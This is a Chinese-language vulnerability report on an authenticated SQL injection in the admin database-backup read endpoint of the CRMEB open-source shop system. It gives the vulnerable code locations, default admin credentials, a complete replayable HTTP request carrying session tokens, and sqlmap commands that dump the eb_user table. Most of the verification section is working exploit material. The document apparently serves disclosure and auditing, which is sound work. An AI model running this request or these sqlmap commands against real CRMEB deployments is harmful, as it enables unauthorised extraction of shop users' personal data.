CRMEB是众邦科技的一款开源商城系统。是Gitee最有价值开源项目(GVP)。 Star数17.6K
项目地址:https://gitee.com/ZhongBangKeJi/CRMEB
官网地址:https://www.crmeb.com/
演示地址:https://v6.crmeb.net/admin/
漏洞描述:CRMEB的后台数据备份功能读取数据库表结构时,将用户传入的 tablename 参数直接拼接至 SQL 查询语句,未使用参数化查询或输入过滤,导致认证后的 SQL 注入漏洞。
漏洞等级:中
漏洞前提:需要认证
代码审计:
入口:crmeb/app/adminapi/controller/v1/system/SystemDatabackup.php:53-56
Sink:crmeb/app/services/system/SystemDatabackupServices.php:65-74
漏洞验证:
- 使用Docker启动服务,后台: http://localhost:8080/admin (账号: admin,密码: crmeb.com)。
在如图位置点击详情触发接口地址。
- 通过 1 = 1验证共有1980条数据。 正常请求只有55条
GET /adminapi/system/backup/read?tablename=eb_user* HTTP/1.1
Host: 10.12.169.249:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Accept: application/json, text/plain, */*
Authori-zation: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJwd2QiOiJmZTNhNjU5YTk4NDQ4M2VjM2MzZWY5NDNhNzJmYTRmOSIsImlzcyI6IjEwLjEyLjE2OS4yNDk6ODA4MCIsImF1ZCI6IjEwLjEyLjE2OS4yNDk6ODA4MCIsImlhdCI6MTc4MTMzNDY1NiwibmJmIjoxNzgxMzM0NjU2LCJleHAiOjE3ODM5MjY2NTYsImp0aSI6eyJpZCI6MSwidHlwZSI6ImFkbWluIn19.R-sl6jGeuJH4yJuqIERsEkNbDQ1shegG6jJj1WUo6q0
Referer: http://10.12.169.249:8080/admin/system/maintain/system_databackup/index
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: access_token=%22eyJraWQiOiIxMDA5ZWFjMi03YjZmLTQ1YmEtOWFjYS0wYTNhMjU5YWQ4NGMiLCJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJuZXhpb3QiLCJhdWQiOiJ3ZWIiLCJuYmYiOjE3ODEyNDEyMTMsImlzcyI6Imh0dHA6Ly9sb2NhbGhvc3Q6OTA5MSIsImV4cCI6MTc4MTI0NDgxMywiaWF0IjoxNzgxMjQxMjEzLCJqdGkiOiI0YzlmYmQ0Yi1kYmJlLTRlMTktOTEzOS1hMzVmZGQxYjI3YTMifQ.GuwjiXQ296FuUZly4vS6wHUC0_OHWxERX1g8qSDjU6pIK6wKwSukhO9r8U4rZsz0PGAtZcjVqzIpSV_Z8AIFlLT547daQPMrdCxvH45UTopVZTO2PhKLTMHyM4N4yROrMn_Wo7wujt_4nz6e_ZD2k6D7TV-Erhe0Vusm1N2wqWeexi5e9mA8catdd3VGjsxRO8h4FtPHoccEGF-_iDYQwJSgYu1bMAmN4xUERGWGE1ohqWGJbWesQJKkE-bC74_RniE4ACMEbtDibSGgdAfr9pniKZNXnnh9XduQM0CNGqxjPZGa1lmVY2-VYHusz67KafTdyG8C2JIoMsXvzWtowQ%22; cb_lang=zh-cn; PHPSESSID=a41d331c25ccb597654d37b0f8c562df; from-crmeb-admin%3AWS_ADMIN_URL=ws://10.12.169.249:8080/notice; from-crmeb-admin%3AWS_CHAT_URL=ws://10.12.169.249:8080/msg; from-crmeb-admin%3Auuid=1; from-crmeb-admin%3Atoken=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJwd2QiOiJmZTNhNjU5YTk4NDQ4M2VjM2MzZWY5NDNhNzJmYTRmOSIsImlzcyI6IjEwLjEyLjE2OS4yNDk6ODA4MCIsImF1ZCI6IjEwLjEyLjE2OS4yNDk6ODA4MCIsImlhdCI6MTc4MTMzNDY1NiwibmJmIjoxNzgxMzM0NjU2LCJleHAiOjE3ODM5MjY2NTYsImp0aSI6eyJpZCI6MSwidHlwZSI6ImFkbWluIn19.R-sl6jGeuJH4yJuqIERsEkNbDQ1shegG6jJj1WUo6q0; from-crmeb-admin%3Aexpires_time=1783926656
Connection: keep-alive
将如上数据包放入SQLMAP。python3 sqlmap.py -r poc.txt
python3 sqlmap.py -r poc.txt -D crmeb -T eb_user --dump
